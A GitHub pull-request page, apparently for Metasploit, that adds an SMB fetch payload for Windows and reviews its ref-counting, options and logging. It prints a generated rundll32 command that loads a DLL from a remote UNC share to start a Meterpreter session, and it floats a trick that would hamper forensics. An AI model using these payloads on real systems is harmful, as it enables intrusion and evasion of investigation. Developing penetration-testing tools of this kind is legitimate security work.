New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add an SMB-based fetch payload for Windows #18664
Add an SMB-based fetch payload for Windows #18664
Conversation
@@ -10,7 +10,11 @@ def initialize(*args) | |||
end | |||
|
|||
def cleanup_handler | |||
cleanup_http_fetch_service(@fetch_service, @delete_resource) | |||
if @fetch_service |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This change in isolation looks good to me; But this cleanup_http_fetch_service
implementation that gets called looks very odd to me:
def cleanup_http_fetch_service(fetch_service, delete_resource) | |
unless fetch_service.nil? | |
escaped_srvuri = ('/' + srvuri).gsub('//', '/') | |
if fetch_service.resources.include?(escaped_srvuri) && delete_resource | |
fetch_service.remove_resource(escaped_srvuri) | |
end | |
fetch_service.deref | |
if fetch_service.resources.empty? | |
# if we don't call deref, we cannot start another httpserver | |
# this is a reimplementation of the cleanup_service method | |
# in Exploit::Remote::SocketServer | |
temp_service = fetch_service | |
fetch_service = nil | |
temp_service.cleanup | |
temp_service.deref | |
end | |
end | |
end |
I don't think there should be two calls to deref
in a single cleanup call, is there another issue hidden here maybe? 🤔
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yeah the ref counting is wrong here; Verified with some extra logging to rex-core:
diff --git a/lib/rex/sync/ref.rb b/lib/rex/sync/ref.rb
index 50b0146..9087747 100644
--- a/lib/rex/sync/ref.rb
+++ b/lib/rex/sync/ref.rb
@@ -45,6 +45,8 @@ module Ref
@_references = 1
@_references_mutex = Mutex.new
+ $stderr.puts "[ref-count] calling refinit: #{caller}, total references: current #{@_references}"
+
self
end
@@ -54,6 +56,7 @@ module Ref
def ref
@_references_mutex.synchronize {
@_references += 1
+ $stderr.puts "[ref-count] creating ref: #{caller}, total references: current #{@_references}"
}
self
@@ -65,11 +68,15 @@ module Ref
#
def deref
@_references_mutex.synchronize {
- if ((@_references -= 1) == 0)
+ @_references -= 1
+ $stderr.puts "[ref-count] creating deref: #{caller}, total references: #{@_references}"
+ if (@_references == 0)
+ $stderr.puts "[ref-count] calling cleanup"
cleanup
true
else
+ $stderr.puts "[ref-count] no cleanup required"
false
end
}
We end up with a refcount of -1
as far as I can see from a quick glance
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yeah that looks like an issue, but I copied it over from @bwatters-r7's original implementation here. I tested it again by removing everything after the fetch_service.deref
line and confirmed I can start two services then tear them down individually and the HTTP server will remain until the last handler job is killed which is the expected behavior. Based on that, I don't think the explicit call to #cleanup
is necessary, it looks like #deref
handles it automatically.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I always thought this was wonky; I never understood why we needed to deref
until empty, the deref
again. I know in theory, it should call its own cleanup when the refcount is 0, but that expectation did not match reality.
I will go back and take a look, but I know that I could not start a second service without the second deref, and I am pretty sure that the service was never stopped. I spent a long time trying to figure out what was going on, and cursed the rex-sync library repeatedly.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
@bwatters-r7 are we alright to keep the proposed changes or are you still looking into why it needed to be done this way?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I started looking at the old commits and was trying to remember what tests I ran that made me think this was an issue. It is on my list for today to see if I can figure it out.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I found the conversation where I think I was working on this. I was unable to recreate the issue when I removed
if fetch_service.resources.empty?
# if we don't call deref, we cannot start another httpserver
# this is a reimplementation of the cleanup_service method
# in Exploit::Remote::SocketServer
temp_service = fetch_service
fetch_service = nil
temp_service.cleanup
temp_service.deref
end
That said, I also can not longer use the _servicemanager
command.... it was hidden behind a feature flag that does not exist, and I cannot find a built-in command that matches..... It is also late, so I might be misremembering or completely missing it. I'll look again tomorrow, but this looks like an overcorrection on my part right now.
Noticed this crash when poking around on the PR briefly for the HTTP service changes, I don't think it's related to this PR specifically - but thought I'd write it down:
|
d2045aa
to
17b034b
Compare
You're right, this was an existing issue but I did fix it in 17b034b. I opted to use the pattern I saw in the reverse TCP stagers which was to default to '127.127.127.127' when the host was not defined. The host should be defined though, because LHOST is a required option. I updated the definition of |
super | ||
register_options( | ||
[ | ||
Msf::OptString.new('FETCH_FILENAME', [ true, 'Payload file name to fetch; cannot contain spaces or slashes.', 'test.dll'], regex: /^[^\s\/\\]*$/), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
To make sure that this is standardized between venom/framework and still have some amount of pseudo randomness, we could make the same approach we did with the uri:
def default_srvuri |
Admittedly, I am not sure if it is worth it. a sig on test.dll
would be a nightmare.
Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]), | ||
Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ false, 'Local IP to use for serving payload']), | ||
# FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set | ||
Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Not a blocker; This UX is a bit weird for me having to specify FETCH_SRVHOST instead of the normal LHOST convention 😄
msf6 payload(cmd/windows/smb/x64/messagebox) > generate -f raw lhost=192.168.123.1
[-] Payload generation failed: One or more options failed to validate: FETCH_SRVHOST.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This makes sense to me?
If there is an LHOST
value (reverse port-enabled payloads), FETCH_SRVHOST
is optional, and if it is blank we use the LHOST
value.
If there is no LHOST
value, we require the FETCH_SRVHOST
value.
There are a lot of situations where we would like the LHOST
and FETCH_SRVHOST
to be different, though.
msf6 payload(cmd/windows/smb/x64/meterpreter_reverse_tcp) > show options
Module options (payload/cmd/windows/smb/x64/meterpreter_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
EXTENSIONS no Comma-separate list of extensions to load
EXTINIT no Initialization strings for extensions
FETCH_FILENAME test.dll yes Payload file name to fetch; cannot contain spaces or slashes.
FETCH_SRVHOST no Local IP to use for serving payload
FETCH_URIPATH no Local URI to use for serving payload
LHOST 10.5.135.201 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
View the full module info with the info, or info -d command.
msf6 payload(cmd/windows/smb/x64/meterpreter_reverse_tcp) > generate -f raw
rundll32 \\10.5.135.201\XgxUu-11BP4H1Dy-9LxxVA\test.dll,0
This works great for me, but sometimes when I swap around and stop/start SMB modules - it stops working: I can see the job is running fine:
And from the logs it looks like the disk share is added successfully - then it just doesn't work:
If I close and reopen msfconsole then it starts working again:
Is there inbuilt logic to ignore additional incoming requests from the same target? Similar to the smb relay logic? |
@adfoster-r7 Do you have a particular order and/or modules you ran to trigger that condition or is it sporadic? |
In that most recent dump, I just started I see Brendan's assigned himself now, so I can see if he bumps into that issue or not too |
@adfoster-r7 I was unable to reproduce any issues by following those steps. Testing Output
|
) | ||
|
||
log_device = LogDevice::Framework.new(framework) | ||
logger = Logger.new(self, log_device) |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
What are your thoughts on following the pattern that the smb_relay module uses?
i.e. Verbose will log to stdout which is useful for debugging things without needing tail -f
on the framework log
def smb_logger
log_device = datastore['VERBOSE'] ? Msf::Exploit::Remote::SMB::LogAdapter::LogDevice::Module.new(self) : Msf::Exploit::Remote::SMB::LogAdapter::LogDevice::Framework.new(framework)
Msf::Exploit::Remote::SMB::LogAdapter::Logger.new(self, log_device)
end
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Added in commit 209f778. I realized though that once the server instance is shared because #18680 is landed that only the VERBOSE setting of the original module will be used. That could cause some confusion when the messages don't show up because the first module that started the SMB server isn't configured the same way. This discussion may be better over in the other PR, but to alleviate that confusion, we could take the logger's configuration into the .hardcore_alias
method, but that would mean that every SMB module would need to use the same VERBOSE setting, which could be worse.
I think the best solution could be something more general that sends the framework logs to stdout or stderr, but that's outside the scope of this project.
cleanup_handler | ||
fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{Rex::Socket.to_authority(srvhost, srvport)}\n#{e}") | ||
end | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This is absolutely not blocking, but reading this it strikes me we could add a layer of sneaky by implementing the trick from themebleed- this should open the file for execution, but if someone saw this unc path and wanted to do forensics, they'd request it and that would open it for read. If we served a separate file for read/execute like themebleed, it would make forensics harder. Not sure if it is worth the additional work and complexity, but it would be a sneaky move.
I have some minor odd feelings about the default assumption that we'll always use rundll32 and use Windows system to query it as a diskless implementation. Yes, Windows systems cannot use any port other than 445, but if we chose to allow it to download and run an exe using CURL, I think we could use non-port 445? Also same thing if we wanted to let Linux pull down a file through smb on a random port. What are your thoughts to adding |
TIL! Thanks, Microsoft. |
36bef19
to
f484a81
Compare
* Build the HTTPS server on top of HTTP instead of the other way around * Set the fetch service to nil after it has been cleaned up * Don't capitalize the H in the word handler * Check if the fetch_service is truthy before cleaning it up * Remove the unused FetchServerName datastore option * Fixup the description text * Don't allow slashes in fetch file names * Also add the #fetch_bindnetloc method Fix a problem in fetch/tftp.rb
The SRVPORT datastore option is registered by the Remote::SMB::Server mixin so including it here is redundant.
Use #srvport instead of the datastore and pull in upstream chanes for the metasploit-credential gem to enable use within payloads.
Fix instances where the `info` command would raise an exception while generating the payload to calculate its length.
f484a81
to
44916e6
Compare
I came across an issue with
It doesn't occur with a bind payload ( Also, I'm not sure if it is expected, but I noticed the services are still running even after the module finished:
I checked with |
@cdelafuente-r7 I was able to reproduce the issue you ran into and fixed it in 7e59380. The issue was related to the |
4009252
to
7e59380
Compare
Thanks for updating this @zeroSteiner ! Everything looks good to me now. I tested against Windows Server 2019, Windows 7 and Windows 11 and verified I got a session. I'll go ahead and land it.
|
Release NotesThis adds an SMB fetch-payload service and a new payload to use it. The payload invokes |
Additionally closes #18664
This adds an SMB fetch-payload service and a new payload to use it. The payload invokes
rundll32
but handles everything for the user automatically. This is basically the same as what theexploit/windows/smb/smb_delivery
module does but as a payload meaning that the generated command can be automatically incorporated into exploits for the Windows platform that have an ARCH_CMD target.Also included are some changes in commit 0fd5517 that fix up some things I noticed while figuring out how to implement a new fetch server. Overall, they aim to make things behave more consistently and fix up some text strings that are displayed to the user.
payload/cmd/windows/smb/x64/meterpreter/reverse_tcp
module